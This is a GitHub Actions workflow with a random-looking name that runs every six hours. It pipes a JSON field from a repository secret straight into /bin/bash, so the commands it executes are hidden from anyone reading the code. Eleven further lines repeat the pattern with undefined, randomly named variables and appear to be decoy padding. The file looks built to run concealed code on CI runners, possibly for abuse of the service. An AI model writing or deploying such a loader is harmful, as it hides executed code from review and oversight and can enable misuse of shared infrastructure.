name: greedycrummy

on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: greedycrummy
        env:
          w33: ${{ secrets.w33 }}
        run: |
          echo $w33 | jq -r .inamp9795 | /bin/bash
          echo $ynay99854 | jq -r .xi9282 | /bin/bash
          echo $tjitg50034 | jq -r .n3 | /bin/bash
          echo $hog695 | jq -r .ot6068 | /bin/bash
          echo $peq466 | jq -r .la8 | /bin/bash
          echo $zxpm5713 | jq -r .qqipl13 | /bin/bash
          echo $kv42790 | jq -r .e888 | /bin/bash
          echo $rco96859 | jq -r .d45 | /bin/bash
          echo $mzdd272 | jq -r .l8952 | /bin/bash
          echo $n1 | jq -r .k994 | /bin/bash
          echo $dz88637 | jq -r .h73 | /bin/bash
          echo $b276 | jq -r .k57564 | /bin/bash

